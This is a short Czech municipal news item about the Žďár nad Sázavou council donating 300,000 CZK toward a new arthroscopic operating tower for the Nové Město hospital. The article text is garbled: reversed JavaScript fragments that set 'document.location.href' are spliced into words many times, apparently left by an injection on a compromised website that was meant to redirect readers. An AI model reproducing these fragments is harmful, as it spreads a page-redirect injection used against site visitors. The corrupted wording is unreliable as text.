Rainbow page separator

Žďár přispěje nemocnici na nový přístroj

Čtvrtek, 9. dubna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Tři sta tisíc korun se rozhodli žďárští zastupitelé věnovat novoměstské nemocnici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jako příspěvek na zakoupení nové artroskopické operační věže pro miniinvazivní or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedické operace. Věž by měla vyjít na přibližně milion korun a nemocnice by ji ráda pořídila do konce [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roku.
Žďárská radnice hodlá rovněž apelovat na místní významné podnikatelské subjekty, aby i ony na pořízení speciální zdravotnické techniky přispěly. Pokud se tak rozhodnou, peníze poskytnou městu ve formě účelového daru a radnice je poté společně i se svým třistatisícovým příspěvkem věnuje nemocnici.
Přístroj pro artroskopické operace, který již v nemocnici dosluhuje, umožňuje chirurgům operovat klouby miniinvazivní me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todou – bez [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, aby museli provést rozsáhlý chirurgický zákrok. Tím dochází mimo jiné ke zkrácení doby hojení, takže pacient se může dříve navrátit do běžného života.